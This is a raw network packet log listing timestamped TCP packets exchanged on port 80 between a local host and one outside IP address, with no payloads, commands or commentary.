Sep 14, 2024 18:31:12.216495037 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.216501951 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216515064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216527939 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216542006 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.216562986 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.216563940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216578007 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216608047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216619015 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216629982 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216640949 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.216691971 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.216692924 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.216805935 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216818094 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216829062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216837883 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216849089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216861010 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216867924 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.216872931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216885090 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216897011 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216906071 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.216908932 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216922045 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.216944933 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.216979027 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.217081070 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.217092991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.217103958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.217113972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.217124939 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.217135906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.217142105 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.217148066 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.217164993 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.217166901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.217180014 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.217185020 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.217225075 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.217226982 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.217236996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.217252016 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.217257977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.217272997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.217284918 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.217294931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.217295885 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.217344999 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.225414991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.225459099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.225469112 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.225508928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.225521088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.225541115 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.225575924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.225578070 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.225589037 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.225600958 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.225629091 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.225661993 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.254730940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.254750013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.254759073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.254769087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.254779100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.254789114 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.254798889 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.254806995 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.254810095 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.255003929 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.255003929 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.299268007 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.299279928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.299292088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.299344063 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.299360991 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.299374104 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.299391985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.299403906 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.299417973 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.299428940 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.299438000 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.299488068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.299488068 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.299500942 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.299514055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.299524069 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.299545050 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.299546003 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.299559116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.299571037 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.299575090 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.299624920 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.300860882 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.300872087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.300882101 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.300919056 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.300930023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.300945044 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.300945997 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.300960064 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.300991058 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.301013947 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.301024914 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.301043034 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.301054001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.301073074 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.301083088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.301093102 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.301095963 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.301106930 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.301115990 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.301137924 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.301163912 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.301176071 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.301233053 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.301265001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.301276922 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.301287889 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.301299095 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.301311016 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.301321983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.301335096 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.301343918 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.301345110 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.301379919 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.301413059 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.302675009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.302743912 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.302755117 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.302799940 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.302814960 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.302826881 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.302838087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.302850962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.302884102 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.302917957 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.302928925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.302941084 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.302952051 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.302963972 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.302989006 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.303020954 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.303029060 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303041935 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303052902 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303065062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303083897 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.303118944 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.303142071 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303153038 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303164005 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303175926 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303186893 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303198099 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303201914 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.303242922 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.303281069 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303292990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303303957 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303319931 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303330898 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303345919 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.303414106 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.303419113 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303431988 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303443909 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303456068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303478956 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.303522110 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.303595066 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303606033 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303617001 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303627968 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303639889 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303649902 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303661108 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303673029 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303677082 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.303677082 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.303685904 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303698063 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303709984 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303740025 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.303771019 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.303868055 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303879023 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303889990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303900957 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303911924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303921938 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303932905 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303942919 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.303944111 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303956985 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303966045 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.303972006 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303985119 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.303991079 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.304016113 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.304019928 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.304032087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.304053068 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.304092884 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.304111004 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.304122925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.304133892 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.304146051 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.304157019 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.304167986 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.304177999 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.304177999 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.304188967 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.304199934 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.304224014 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.304261923 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.304275036 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.304280996 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.304294109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.304306030 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.304316044 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.304327965 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.304328918 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.304352045 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.304399967 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.312362909 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.312408924 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.312422037 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.312477112 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.312568903 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.312580109 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.312592983 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.312603951 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.312614918 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.312633038 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.312674046 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.341587067 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.341759920 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.341768026 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.341777086 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.341787100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.341795921 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.341806889 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.341815948 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.341825962 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.341828108 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.341877937 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.386322021 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.386336088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.386353970 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.386364937 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.386377096 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.386387110 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.386394978 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.386399031 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.386429071 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.386461020 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.386468887 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.386481047 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.386491060 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.386502028 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.386523008 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.386554003 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.386567116 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.386579037 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.386589050 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.386620998 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.387870073 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.387880087 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.387890100 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.387901068 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.387916088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.387928009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.387938023 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.387938976 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.387952089 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.387960911 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.387967110 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.387980938 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.387985945 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.387985945 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.387991905 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.388004065 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.388016939 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.388022900 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.388036013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.388044119 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.388046980 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.388060093 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.388062000 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.388072968 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.388084888 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.388096094 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.388099909 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.388138056 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.388235092 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.388247013 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.388257980 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.388269901 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.388281107 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.388300896 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.388330936 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.389493942 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.389512062 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.389520884 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.389574051 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.389581919 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.389585018 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.389610052 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.389621019 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.389664888 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.389707088 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.389719009 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.389729977 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.389739990 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.389750957 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.389761925 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.389763117 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.389792919 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.389796019 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.389820099 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.389868975 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.389880896 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.389890909 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.389902115 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.389913082 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.389923096 CEST	80	49738	172.67.203.195	192.168.2.4
Sep 14, 2024 18:31:12.389933109 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.389965057 CEST	49738	80	192.168.2.4	172.67.203.195
Sep 14, 2024 18:31:12.390007019 CEST	80	49738	172.67.203.195	192.168.2.4
